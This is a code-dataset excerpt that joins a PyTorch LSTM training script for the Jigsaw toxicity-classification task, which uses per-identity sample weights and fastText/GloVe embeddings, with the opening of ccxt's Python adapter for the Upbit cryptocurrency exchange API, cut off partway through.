return torch.mean(focal_loss)
else:
return focal_loss
class SpatialDropout(nn.Dropout2d):
def forward(self, x):
x = x.unsqueeze(2) # (N, T, 1, K)
x = x.permute(0, 3, 2, 1) # (N, K, 1, T)
x = super(SpatialDropout, self).forward(x) # (N, K, 1, T), some features are masked
x = x.permute(0, 3, 2, 1) # (N, T, 1, K)
x = x.squeeze(2) # (N, T, K)
return x
class NeuralNet(nn.Module):
def __init__(self, embedding_matrix):
super(NeuralNet, self).__init__()
unique_word_num = embedding_matrix.shape[0]
embed_size = embedding_matrix.shape[1]
lstm_size = 128
dense_size = 512
# 嵌入层
self.embedding = nn.Embedding(unique_word_num, embed_size)
self.embedding.weight = nn.Parameter(torch.tensor(embedding_matrix, dtype=torch.float32))
self.embedding.weight.requires_grad = False
self.embedding_dropout = SpatialDropout(0.3)
# LSTM
self.lstm1 = nn.LSTM(embed_size, lstm_size, bidirectional=True, batch_first=True)
self.lstm2 = nn.LSTM(lstm_size * 2, lstm_size, bidirectional=True, batch_first=True)
# 全连接层
self.linear1 = nn.Linear(dense_size, dense_size)
self.linear2 = nn.Linear(dense_size, dense_size)
self.linear3 = nn.Linear(dense_size * 2, dense_size)
# 输出层
self.linear_out = nn.Linear(dense_size, 1)
self.linear_aux_out = nn.Linear(dense_size, 5)
self.linear_identity_out = nn.Linear(dense_size, 9)
self.linear_np_out = nn.Linear(dense_size, 4)
self.linear_identity_out2 = nn.Linear(dense_size, dense_size)
self.bn1 = nn.BatchNorm1d(dense_size)
self.bn2 = nn.BatchNorm1d(dense_size)
def forward(self, x):
# 嵌入层
h_embedding = self.embedding(x)
h_embedding = self.embedding_dropout(h_embedding)
# LSTM
h_lstm1, _ = self.lstm1(h_embedding)
h_lstm2, _ = self.lstm2(h_lstm1)
# pooling
avg_pool = torch.mean(h_lstm2, 1)
max_pool, _ = torch.max(h_lstm2, 1)
# 全连接层
h_conc = torch.cat((max_pool, avg_pool), 1)
identity_hidden = self.linear_identity_out2(h_conc)
identity_hidden = F.relu(identity_hidden)
#identity_hidden = self.bn1(identity_hidden)
identity_hidden = F.dropout(identity_hidden, p=0.3)
np_result = self.linear_np_out(identity_hidden)
h_conc2 = torch.cat((h_conc, identity_hidden), 1)
gate_hidden = self.linear3(h_conc2)
#gate_hidden = self.bn2(gate_hidden)
gate = torch.sigmoid(gate_hidden)
#gate = F.dropout(gate, p=0.3)
h_conc = h_conc * gate
h_conc_linear1 = F.relu(self.linear1(h_conc))
h_conc_linear2 = F.relu(self.linear2(h_conc))
# 拼接
hidden = h_conc + h_conc_linear1 + h_conc_linear2
# 输出层,用 sigmoid 就用 BCELoss,不用 sigmoid 就用 BCEWithLogitsLoss
result = self.linear_out(hidden)
aux_result = self.linear_aux_out(hidden)
out = torch.cat([result, aux_result, np_result], 1)
return out
class Trainer:
def __init__(self, model_name, epochs=5, batch_size=512, part=1., seed=1234, debug_mode=False):
self.debug_mode = debug_mode
self.model_name = model_name
self.seed = seed
self.identity_list = ['male', 'female', 'homosexual_gay_or_lesbian', 'christian', 'jewish', 'muslim', 'black', 'white', 'psychiatric_or_mental_illness']
self.toxicity_type_list = ['severe_toxicity', 'obscene', 'identity_attack', 'insult', 'threat']
if part == 1.:
self.weight_dict = {"severe_toxicity": 1000, "obscene": 235, "identity_attack": 236, "insult": 22,
"threat": 646, "male": 45, "female": 35, "homosexual_gay_or_lesbian": 176, "christian": 50,
"jewish": 249, "muslim": 91, "black": 130, "white": 75, "psychiatric_or_mental_illness": 442,
"pp": 101, "np": 13, "pn": 20, "nn": 1,
"pp_male": 431, "np_male": 50, "pn_male": 17, "nn_male": 1,
"pp_female": 384, "np_female": 39, "pn_female": 17, "nn_female": 1,
"pp_homosexual_gay_or_lesbian": 900, "np_homosexual_gay_or_lesbian": 219, "pn_homosexual_gay_or_lesbian": 17, "nn_homosexual_gay_or_lesbian": 1,
"pp_christian": 859, "np_christian": 54, "pn_christian": 17, "nn_christian": 1,
"pp_jewish": 2365, "np_jewish": 278, "pn_jewish": 17, "nn_jewish": 1,
"pp_muslim": 606, "np_muslim": 108, "pn_muslim": 17, "nn_muslim": 1,
"pp_black": 586, "np_black": 167, "pn_black": 17, "nn_black": 1,
"pp_white": 387, "np_white": 94, "pn_white": 17, "nn_white": 1,
"pp_psychiatric_or_mental_illness": 2874, "np_psychiatric_or_mental_illness": 523, "pn_psychiatric_or_mental_illness": 17, "nn_psychiatric_or_mental_illness": 1}
else:
self.weight_dict = {"severe_toxicity": 1000, "obscene": 196, "identity_attack": 278, "insult": 22,
"threat": 609, "male": 45, "female": 33, "homosexual_gay_or_lesbian": 198, "christian": 48,
"jewish": 243, "muslim": 133, "black": 131, "white": 90, "psychiatric_or_mental_illness": 369,
"pp": 107, "np": 13, "pn": 19, "nn": 1,
"pp_male": 434, "np_male": 51, "pn_male": 17, "nn_male": 1,
"pp_female": 324, "np_female": 37, "pn_female": 17, "nn_female": 1,
"pp_homosexual_gay_or_lesbian": 1055, "np_homosexual_gay_or_lesbian": 244, "pn_homosexual_gay_or_lesbian": 17, "nn_homosexual_gay_or_lesbian": 1,
"pp_christian": 986, "np_christian": 50, "pn_christian": 17, "nn_christian": 1,
"pp_jewish": 2680, "np_jewish": 268, "pn_jewish": 16, "nn_jewish": 1,
"pp_muslim": 772, "np_muslim": 161, "pn_muslim": 17, "nn_muslim": 1,
"pp_black": 633, "np_black": 165, "pn_black": 17, "nn_black": 1,
"pp_white": 465, "np_white": 111, "pn_white": 17, "nn_white": 1,
"pp_psychiatric_or_mental_illness": 2748, "np_psychiatric_or_mental_illness": 427, "pn_psychiatric_or_mental_illness": 16, "nn_psychiatric_or_mental_illness": 1}
self.stopwords = '!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n“”’\'∞θ÷α•à−β∅³π‘₹´°£€\×™√²—'
self.seed_everything()
self.max_len = 220
self.epochs = epochs
self.batch_size = batch_size
self.split_ratio = 0.95
self.sample_num = 1804874
if not self.debug_mode:
self.train_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/predict.csv").sample(int(self.sample_num * part), random_state=1234).fillna(0.)
self.test_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/test.csv")
else:
self.train_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/predict.csv").head(1000).fillna(0.)
self.test_df = pd.read_csv("../input/jigsaw-unintended-bias-in-toxicity-classification/test.csv").head(1000)
self.train_len = int(len(self.train_df) * self.split_ratio)
self.evaluator = self.init_evaluator()
def seed_everything(self):
random.seed(self.seed)
os.environ['PYTHONHASHSEED'] = str(self.seed)
np.random.seed(self.seed)
torch.manual_seed(self.seed)
torch.cuda.manual_seed(self.seed)
torch.backends.cudnn.deterministic = True
def init_evaluator(self):
# 初始化评分函数类
y_true = self.train_df['target'].values
y_identity = self.train_df[self.identity_list].values
valid_y_true = y_true[self.train_len:]
valid_y_identity = y_identity[self.train_len:]
evaluator = JigsawEvaluator(valid_y_true, valid_y_identity) # y_true 必须是0或1,不能是离散值
return evaluator
def create_dataloader(self):
# 读取输入输出
train_comments = self.train_df["comment_text"].astype(str)
train_label = self.train_df["target"].values
train_type_labels = self.train_df[self.toxicity_type_list].values
# 新的 np 任务
train_np_labels = np.zeros((len(self.train_df), 4))
train_np_identity_labels = np.zeros((len(self.train_df), len(self.identity_list) * 4))
train_df_copy = self.train_df[self.identity_list + ["target"]]
for column in self.identity_list + ["target"]:
train_df_copy[column] = np.where(train_df_copy[column] > 0.5, True, False)
pp_label_bool = train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
np_label_bool = ~train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
pn_label_bool = train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
nn_label_bool = ~train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
train_np_labels[:, 0] = np.where(pp_label_bool > 0, 1, 0)
train_np_labels[:, 1] = np.where(np_label_bool > 0, 1, 0)
train_np_labels[:, 2] = np.where(pn_label_bool > 0, 1, 0)
train_np_labels[:, 3] = np.where(nn_label_bool > 0, 1, 0)
for i, column in enumerate(self.identity_list):
pp_label_bool = train_df_copy["target"] & train_df_copy[column]
np_label_bool = ~train_df_copy["target"] & train_df_copy[column]
pn_label_bool = train_df_copy["target"] & (~train_df_copy[column])
nn_label_bool = ~train_df_copy["target"] & (~train_df_copy[column])
train_np_identity_labels[:, i * 4 + 0] = np.where(pp_label_bool > 0, 1, 0)
train_np_identity_labels[:, i * 4 + 1] = np.where(np_label_bool > 0, 1, 0)
train_np_identity_labels[:, i * 4 + 2] = np.where(pn_label_bool > 0, 1, 0)
train_np_identity_labels[:, i * 4 + 3] = np.where(nn_label_bool > 0, 1, 0)
# 身份原始值
train_identity_values = self.train_df[self.identity_list].fillna(0.).values
# 所有身份原始值之和
train_identity_sum = train_identity_values.sum(axis=1)
# 将身份之和限制在1以下(sigmoid)
train_identity_sum_label = np.where(train_identity_sum > 1, 1, train_identity_sum)
# 身份01值
train_identity_binary = copy.deepcopy(self.train_df[self.identity_list])
for column in self.identity_list:
train_identity_binary[column] = np.where(train_identity_binary[column] > 0.5, 1, 0)
# 身份01值有一个就算1
train_identity_binary_sum = train_identity_binary.sum(axis=1)
train_identity_or_binary = np.where(train_identity_binary_sum >= 1, 1, 0)
# 所有身份标签
train_identity_type_labels = train_identity_values
train_identity_type_binary_lables = train_identity_binary
train_identity_sum_label = train_identity_sum_label
train_identity_binary_label = train_identity_or_binary
# tokenizer 训练
test_comments = self.test_df["comment_text"].astype(str)
tokenizer = text.Tokenizer(filters=self.stopwords)
tokenizer.fit_on_texts(list(train_comments) + list(test_comments)) # train_comments 是 dataframe 的一列,是 Series 类, list(train_comments) 直接变成 list
# tokenization
train_tokens = tokenizer.texts_to_sequences(train_comments) # 可以给 Series 也可以给 list?
test_tokens = tokenizer.texts_to_sequences(test_comments)
# 用 sequence 类补到定长
train_tokens = sequence.pad_sequences(train_tokens, maxlen=self.max_len)
test_tokens = sequence.pad_sequences(test_tokens, maxlen=self.max_len)
# 划分训练集和验证集
valid_tokens = train_tokens[self.train_len:]
valid_label = train_label[self.train_len:]
valid_type_labels = train_type_labels[self.train_len:]
train_tokens = train_tokens[:self.train_len]
train_label = train_label[:self.train_len]
train_type_labels = train_type_labels[:self.train_len]
valid_identity_type_labels = train_identity_type_labels[self.train_len:]
train_identity_type_labels = train_identity_type_labels[:self.train_len]
valid_identity_type_binary_lables = train_identity_type_binary_lables[self.train_len:]
train_identity_type_binary_lables = train_identity_type_binary_lables[:self.train_len]
valid_identity_sum_label = train_identity_sum_label[self.train_len:]
train_identity_sum_label = train_identity_sum_label[:self.train_len]
valid_identity_binary_label = train_identity_binary_label[self.train_len:]
train_identity_binary_label = train_identity_binary_label[:self.train_len]
valid_np_labels = train_np_labels[self.train_len:]
train_np_labels = train_np_labels[:self.train_len]
valid_np_identity_labels = train_np_identity_labels[self.train_len:]
train_np_identity_labels = train_np_identity_labels[:self.train_len]
# 计算样本权重
target_weight, aux_weight, identity_weight, np_weight, np_identity_weight = self.cal_sample_weights()
#train_np_labels
#train_np_identity_labels
# 将符号化数据转成 tensor
train_x_tensor = torch.tensor(train_tokens, dtype=torch.long)
valid_x_tensor = torch.tensor(valid_tokens, dtype=torch.long)
train_y_tensor = torch.tensor(np.hstack([train_label[:, np.newaxis], train_type_labels, train_identity_type_labels, train_np_labels]), dtype=torch.float32)
valid_y_tensor = torch.tensor(np.hstack([valid_label[:, np.newaxis], valid_type_labels, valid_identity_type_labels, valid_np_labels]), dtype=torch.float32)
target_weight_tensor = torch.tensor(target_weight, dtype=torch.float32)
aux_weight_tensor = torch.tensor(aux_weight, dtype=torch.float32)
identity_weight_tensor = torch.tensor(identity_weight, dtype=torch.float32)
np_weight_tensor = torch.tensor(np_weight, dtype=torch.float32)
np_identity_weight_tensor = torch.tensor(np_identity_weight, dtype=torch.float32)
if torch.cuda.is_available():
train_x_tensor = train_x_tensor.cuda()
valid_x_tensor = valid_x_tensor.cuda()
train_y_tensor = train_y_tensor.cuda()
valid_y_tensor = valid_y_tensor.cuda()
target_weight_tensor = target_weight_tensor.cuda()
aux_weight_tensor = aux_weight_tensor.cuda()
identity_weight_tensor = identity_weight_tensor.cuda()
np_weight_tensor = np_weight_tensor.cuda()
np_identity_weight_tensor = np_identity_weight_tensor.cuda()
# 将 tensor 转成 dataset,训练数据和标签一一对应,用 dataloader 加载的时候 dataset[:-1] 是 x,dataset[-1] 是 y
train_dataset = data.TensorDataset(train_x_tensor, train_y_tensor, target_weight_tensor, aux_weight_tensor, identity_weight_tensor, np_weight_tensor, np_identity_weight_tensor)
valid_dataset = data.TensorDataset(valid_x_tensor, valid_y_tensor)
# 将 dataset 转成 dataloader
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=self.batch_size, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=self.batch_size, shuffle=False)
# 返回训练数据
return train_loader, valid_loader, tokenizer
def cal_sample_weights(self):
# aux weight
aux_weight = np.zeros((len(self.train_df), len(self.toxicity_type_list)))
for i, column in enumerate(self.toxicity_type_list):
weight = math.pow(self.weight_dict[column], 0.5)
aux_weight[:, i] = np.where(self.train_df[column] > 0.5, weight, 1)
# identity weight
identity_weight = np.zeros((len(self.train_df), len(self.identity_list)))
for i, column in enumerate(self.identity_list):
weight = math.pow(self.weight_dict[column], 0.5)
identity_weight[:, i] = np.where(self.train_df[column] > 0.5, weight, 1)
# np weight
np_weight = np.zeros((len(self.train_df), 4))
np_identity_weight = np.zeros((len(self.train_df), len(self.identity_list) * 4))
train_df_copy = self.train_df[self.identity_list + ["target"]]
for column in self.identity_list + ["target"]:
train_df_copy[column] = np.where(train_df_copy[column] > 0.5, True, False)
pp_label_bool = train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
np_label_bool = ~train_df_copy["target"] & np.where(train_df_copy[self.identity_list].sum(axis=1) > 0, True, False)
pn_label_bool = train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
nn_label_bool = ~train_df_copy["target"] & np.where((train_df_copy[self.identity_list]).sum(axis=1) == 0, True, False)
np_weight[:, 0] = np.where(pp_label_bool > 0, 1, 1)
np_weight[:, 1] = np.where(np_label_bool > 0, 1, 1)
np_weight[:, 2] = np.where(pn_label_bool > 0, 1, 1)
np_weight[:, 3] = np.where(nn_label_bool > 0, 1, 1)
for i, column in enumerate(self.identity_list):
pp_label_bool = train_df_copy["target"] & train_df_copy[column]
np_label_bool = ~train_df_copy["target"] & train_df_copy[column]
pn_label_bool = train_df_copy["target"] & (~train_df_copy[column])
nn_label_bool = ~train_df_copy["target"] & (~train_df_copy[column])
np_identity_weight[:, i * 4 + 0] = np.where(pp_label_bool > 0, self.weight_dict["pp_%s" % column], 1)
np_identity_weight[:, i * 4 + 1] = np.where(np_label_bool > 0, self.weight_dict["np_%s" % column], 1)
np_identity_weight[:, i * 4 + 2] = np.where(pn_label_bool > 0, self.weight_dict["pn_%s" % column], 1)
np_identity_weight[:, i * 4 + 3] = np.where(nn_label_bool > 0, self.weight_dict["nn_%s" % column], 1)
# target weight
for column in self.identity_list + ["target"]:
self.train_df[column] = np.where(self.train_df[column] > 0.5, True, False)
target_weight = np.ones(len(self.train_df))
target_weight += self.train_df["target"]
if False:
target_weight += (~self.train_df["target"]) * self.train_df[self.identity_list].sum(axis=1)
target_weight += self.train_df["target"] * (~self.train_df[self.identity_list]).sum(axis=1) * 5
else:
target_weight += (~self.train_df["target"]) * np.where(self.train_df[self.identity_list].sum(axis=1) > 0, 1, 0) * 3
target_weight += self.train_df["target"] * np.where((~self.train_df[self.identity_list]).sum(axis=1) > 0, 1, 0) * 3
target_weight /= target_weight.mean()
# 只留训练集
target_weight = np.array(target_weight)
target_weight = target_weight[:self.train_len]
aux_weight = aux_weight[:self.train_len, :]
identity_weight = identity_weight[:self.train_len, :]
np_weight = np_weight[:self.train_len, :]
np_identity_weight = np_identity_weight[:self.train_len, :]
return target_weight, aux_weight, identity_weight, np_weight, np_identity_weight
def create_emb_weights(self, word_index):
# 构建词向量字典
with open("../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec", "r") as f:
fasttext_emb_dict = {}
for i, line in enumerate(f):
if i == 1000 and self.debug_mode: break
split = line.strip().split(" ")
word = split[0]
if word not in word_index: continue
emb = np.array([float(num) for num in split[1:]])
fasttext_emb_dict[word] = emb
with open("../input/glove840b300dtxt/glove.840B.300d.txt", "r") as f:
glove_emb_dict = {}
for i, line in enumerate(f):
if i == 1000 and self.debug_mode: break
split = line.strip().split(" ")
word = split[0]
if word not in word_index: continue
emb = np.array([float(num) for num in split[1:]])
glove_emb_dict[word] = emb
# 为训练集和测试集出现过的词构建词向量矩阵
word_embedding = np.zeros((len(word_index) + 1, 600)) # tokenizer 自动留出0用来 padding
np.random.seed(1234)
fasttext_random_emb = np.random.uniform(-0.25, 0.25, 300) # 用于 fasttext 找不到词语时
np.random.seed(1235)
glove_random_emb = np.random.uniform(-0.25, 0.25, 300) # 用于 glove 找不到词语时
for word, index in word_index.items():
# 如果找不到 emb,尝试小写或首字母大写
if word not in fasttext_emb_dict and word not in glove_emb_dict:
word = word.lower()
if word not in fasttext_emb_dict and word not in glove_emb_dict:
word = word.title()
if word not in fasttext_emb_dict and word not in glove_emb_dict:
word = word.upper()
fasttext_emb = fasttext_emb_dict[word] if word in fasttext_emb_dict else fasttext_random_emb
glove_emb = glove_emb_dict[word] if word in glove_emb_dict else glove_random_emb
word_embedding[index] = np.concatenate((fasttext_emb, glove_emb), axis=-1)
return np.array(word_embedding)
def sigmoid(self, x):
return 1 / (1 + np.exp(-x))
def custom_loss(self, y_pred, y_batch, epoch, target_weight=1., aux_weight=1., identity_weight=1., np_weight=1.):
target_pred = y_pred[:, 0]
target_true = y_batch[:, 0]
aux_pred = y_pred[:, 1: 6]
aux_true = y_batch[:, 1: 6]
np_pred = y_pred[:, 6: 10]
np_true = y_batch[:, 6: 10]
if epoch > 9:
target_loss = FocalLoss()(target_pred, target_true)
else:
target_loss = nn.BCEWithLogitsLoss(reduction="none")(target_pred, target_true)
target_loss = torch.mean(target_loss * target_weight)
if epoch > 9:
aux_loss = FocalLoss()(aux_pred, aux_true)
else:
aux_loss = nn.BCEWithLogitsLoss(reduction="none")(aux_pred, aux_true)
aux_loss = torch.mean(aux_loss * aux_weight)
if epoch > 9:
np_loss = FocalLoss()(np_pred, np_true)
else:
np_loss = nn.BCEWithLogitsLoss(reduction="none")(np_pred, np_true)
np_loss = torch.mean(np_loss * np_weight)
return target_loss, aux_loss, np_loss
def train(self):
if self.debug_mode: self.epochs = 1
# 加载 dataloader
train_loader, valid_loader, tokenizer = self.create_dataloader()
# 生成 embedding
word_embedding = self.create_emb_weights(tokenizer.word_index)
# 训练
self.seed_everything()
model = NeuralNet(word_embedding)
if torch.cuda.is_available():
model.cuda()
lr = 1e-3
# param_lrs = [{'params': param, 'lr': lr} for param in model.parameters()] # 可以为不同层设置不同的学习速率
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
# 渐变学习速率
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lambda epoch: 0.6 ** epoch)
# 损失函数
loss_fn = nn.BCEWithLogitsLoss(reduction='mean')
# 训练
previous_auc_score = 0
stop_flag = 0
for epoch in range(self.epochs):
start_time = time.time()
# 调整一次学习速率
if epoch <= 10:
scheduler.step()
# 切换为训练模式
model.train()
# 初始化当前 epoch 的 loss
avg_loss = 0.
# 加载每个 batch 并训练
for batch_data in train_loader:
x_batch = batch_data[0]
y_batch = batch_data[1]
target_weight_batch = batch_data[2]
aux_weight_batch = batch_data[3]
identity_weight_batch = batch_data[4]
np_weight_batch = batch_data[5]
np_identity_weight_batch = batch_data[6]
#y_pred = model(*x_batch)
y_pred = model(x_batch)
target_loss, aux_loss, np_loss = self.custom_loss(y_pred, y_batch, epoch, target_weight_batch, aux_weight_batch, identity_weight_batch, np_weight_batch)
loss = target_loss + aux_loss + np_loss
#loss = loss_fn(y_pred, y_batch)
optimizer.zero_grad()
loss.backward()
optimizer.step()
avg_loss += loss.item() / len(train_loader)
# 计算验证集
model.eval()
y_pred = np.zeros((len(self.train_df) - self.train_len))
for i, batch_data in enumerate(valid_loader):
x_batch = batch_data[:-1]
y_batch = batch_data[-1]
batch_y_pred = self.sigmoid(model(*x_batch).detach().cpu().numpy())[:, 0]
y_pred[i * self.batch_size: (i + 1) * self.batch_size] = batch_y_pred
# 计算得分
auc_score = self.evaluator.get_final_metric(y_pred)
print("epoch: %d duration: %d min auc_score: %.4f" % (epoch, int((time.time() - start_time) / 60), auc_score))
if not self.debug_mode and epoch > 0:
temp_dict = model.state_dict()
del temp_dict['embedding.weight']
torch.save(temp_dict, "model[pytorch][%d][%s][%d][%.4f].bin" % (self.seed, self.model_name, epoch, auc_score))
# del 训练相关输入和模型
training_history = [train_loader, valid_loader, tokenizer, word_embedding, model, optimizer, scheduler]
for variable in training_history:
del variable
gc.collect()
print("train42_architecture.py")
trainer = Trainer(model_name="train10_focal_loss_seed_kernel", epochs=25, batch_size=512, part=1., seed=1234, debug_mode=False)
trainer.train()
"""
fasttext-crawl-300d-2m
glove840b300dtxt
""" | [
"hedongfeng@qingting.fm"
] | hedongfeng@qingting.fm |
ee0adb91af344e1d810954f9043d90cadc24e120 | a04eff13392361cf6effa7b321ff6c931705534c | /python/ccxt/async_support/upbit.py | 40feec213c77dc75d0ea3312fd5faeeafe4b364e | [
"MIT"
] | permissive | Homiex/homiex-ccxt | 89594883f06f72e8eaf3222d43a66370a030dbd2 | f669d7cb2a9276ba07c7782c5ec1a488f13d930d | refs/heads/master | 2022-07-06T19:47:38.759274 | 2020-03-16T09:27:07 | 2020-03-16T09:27:07 | 246,796,828 | 3 | 4 | MIT | 2022-06-23T01:48:09 | 2020-03-12T09:41:33 | JavaScript | UTF-8 | Python | false | false | 60,440 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
class upbit(Exchange):
def describe(self):
return self.deep_extend(super(upbit, self).describe(), {
'id': 'upbit',
'name': 'Upbit',
'countries': ['KR'],
'version': 'v1',
'rateLimit': 1000,
'certified': True,
# new metainfo interface
'has': {
'CORS': True,
'createDepositAddress': True,
'createMarketOrder': True,
'fetchDepositAddress': True,
'fetchClosedOrders': True,
'fetchMyTrades': False,
'fetchOHLCV': True,
'fetchOrder': True,
'fetchOrderBooks': True,
'fetchOpenOrders': True,
'fetchOrders': False,
'fetchTickers': True,
'withdraw': True,
'fetchDeposits': True,
'fetchWithdrawals': True,
'fetchTransactions': False,
},
'timeframes': {
'1m': 'minutes',
'3m': 'minutes',
'5m': 'minutes',
'15m': 'minutes',
'30m': 'minutes',
'1h': 'minutes',
'4h': 'minutes',
'1d': 'days',
'1w': 'weeks',
'1M': 'months',
},
'hostname': 'api.upbit.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/49245610-eeaabe00-f423-11e8-9cba-4b0aed794799.jpg',
'api': 'https://{hostname}',
'www': 'https://upbit.com',
'doc': 'https://docs.upbit.com/docs/%EC%9A%94%EC%B2%AD-%EC%88%98-%EC%A0%9C%ED%95%9C',
'fees': 'https://upbit.com/service_center/guide',
},
'api': {
'public': {
'get': [
'market/all',
'candles/{timeframe}',
'candles/{timeframe}/{unit}',
'candles/minutes/{unit}',
'candles/minutes/1',
'candles/minutes/3',
'candles/minutes/5',
'candles/minutes/15',
'candles/minutes/30',
'candles/minutes/60',
'candles/minutes/240',
'candles/days',
'candles/weeks',
'candles/months',
'trades/ticks',
'ticker',
'orderbook',
],
},
'private': {
'get': [
'accounts',
'orders/chance',
'order',
'orders',
'withdraws',
'withdraw',
'withdraws/chance',
'deposits',
'deposit',
'deposits/coin_addresses',
'deposits/coin_address',
],
'post': [
'orders',
'withdraws/coin',
'withdraws/krw',
'deposits/generate_coin_address',
],
'delete': [
'order',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.0025,
'taker': 0.0025,
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {},
},
},
'exceptions': {
'exact': {
'Missing request parameter error. Check the required parametersnot ': BadRequest,
'side is missing, side does not have a valid value': InvalidOrder,
},
'broad': {
'thirdparty_agreement_required': PermissionDenied,
'out_of_scope': PermissionDenied,
'order_not_found': OrderNotFound,
'insufficient_funds': InsufficientFunds,
'invalid_access_key': AuthenticationError,
'jwt_verification': AuthenticationError,
'create_ask_error': ExchangeError,
'create_bid_error': ExchangeError,
'volume_too_large': InvalidOrder,
'invalid_funds': InvalidOrder,
},
},
'options': {
'createMarketBuyOrderRequiresPrice': True,
'fetchTickersMaxLength': 4096, # 2048,
'fetchOrderBooksMaxLength': 4096, # 2048,
'symbolSeparator': '-',
'tradingFeesByQuoteCurrency': {
'KRW': 0.0005,
},
},
})
async def fetch_currency(self, code, params={}):
# self method is for retrieving funding fees and limits per currency
# it requires private access and API keys properly set up
await self.load_markets()
currency = self.currency(code)
return await self.fetch_currency_by_id(currency['id'], params)
async def fetch_currency_by_id(self, id, params={}):
# self method is for retrieving funding fees and limits per currency
# it requires private access and API keys properly set up
request = {
'currency': id,
}
response = await self.privateGetWithdrawsChance(self.extend(request, params))
#
# {
# "member_level": {
# "security_level": 3,
# "fee_level": 0,
# "email_verified": True,
# "identity_auth_verified": True,
# "bank_account_verified": True,
# "kakao_pay_auth_verified": False,
# "locked": False,
# "wallet_locked": False
# },
# "currency": {
# "code": "BTC",
# "withdraw_fee": "0.0005",
# "is_coin": True,
# "wallet_state": "working",
# "wallet_support": ["deposit", "withdraw"]
# },
# "account": {
# "currency": "BTC",
# "balance": "10.0",
# "locked": "0.0",
# "avg_krw_buy_price": "8042000",
# "modified": False
# },
# "withdraw_limit": {
# "currency": "BTC",
# "minimum": null,
# "onetime": null,
# "daily": "10.0",
# "remaining_daily": "10.0",
# "remaining_daily_krw": "0.0",
# "fixed": null,
# "can_withdraw": True
# }
# }
#
memberInfo = self.safe_value(response, 'member_level', {})
currencyInfo = self.safe_value(response, 'currency', {})
withdrawLimits = self.safe_value(response, 'withdraw_limit', {})
canWithdraw = self.safe_value(withdrawLimits, 'can_withdraw')
walletState = self.safe_string(currencyInfo, 'wallet_state')
walletLocked = self.safe_value(memberInfo, 'wallet_locked')
locked = self.safe_value(memberInfo, 'locked')
active = True
if (canWithdraw is not None) and canWithdraw:
active = False
elif walletState != 'working':
active = False
elif (walletLocked is not None) and walletLocked:
active = False
elif (locked is not None) and locked:
active = False
maxOnetimeWithdrawal = self.safe_float(withdrawLimits, 'onetime')
maxDailyWithdrawal = self.safe_float(withdrawLimits, 'daily', maxOnetimeWithdrawal)
remainingDailyWithdrawal = self.safe_float(withdrawLimits, 'remaining_daily', maxDailyWithdrawal)
maxWithdrawLimit = None
if remainingDailyWithdrawal > 0:
maxWithdrawLimit = remainingDailyWithdrawal
else:
maxWithdrawLimit = maxDailyWithdrawal
precision = None
currencyId = self.safe_string(currencyInfo, 'code')
code = self.safe_currency_code(currencyId)
return {
'info': response,
'id': currencyId,
'code': code,
'name': code,
'active': active,
'fee': self.safe_float(currencyInfo, 'withdraw_fee'),
'precision': precision,
'limits': {
'withdraw': {
'min': self.safe_float(withdrawLimits, 'minimum'),
'max': maxWithdrawLimit,
},
},
}
async def fetch_market(self, symbol, params={}):
# self method is for retrieving trading fees and limits per market
# it requires private access and API keys properly set up
await self.load_markets()
market = self.market(symbol)
return await self.fetch_market_by_id(market['id'], params)
async def fetch_market_by_id(self, id, params={}):
# self method is for retrieving trading fees and limits per market
# it requires private access and API keys properly set up
request = {
'market': id,
}
response = await self.privateGetOrdersChance(self.extend(request, params))
#
# { bid_fee: "0.0005",
# ask_fee: "0.0005",
# market: { id: "KRW-BTC",
# name: "BTC/KRW",
# order_types: ["limit"],
# order_sides: ["ask", "bid"],
# bid: { currency: "KRW",
# price_unit: null,
# min_total: 1000 },
# ask: { currency: "BTC",
# price_unit: null,
# min_total: 1000 },
# max_total: "1000000000.0",
# state: "active" },
# bid_account: { currency: "KRW",
# balance: "0.0",
# locked: "0.0",
# avg_krw_buy_price: "0",
# modified: False},
# ask_account: { currency: "BTC",
# balance: "0.00780836",
# locked: "0.0",
# avg_krw_buy_price: "6465564.67",
# modified: False } }
#
marketInfo = self.safe_value(response, 'market')
bid = self.safe_value(marketInfo, 'bid')
ask = self.safe_value(marketInfo, 'ask')
marketId = self.safe_string(marketInfo, 'id')
baseId = self.safe_string(ask, 'currency')
quoteId = self.safe_string(bid, 'currency')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': 8,
'price': 8,
}
state = self.safe_string(marketInfo, 'state')
active = (state == 'active')
bidFee = self.safe_float(response, 'bid_fee')
askFee = self.safe_float(response, 'ask_fee')
fee = max(bidFee, askFee)
return {
'info': response,
'id': marketId,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'precision': precision,
'maker': fee,
'taker': fee,
'limits': {
'amount': {
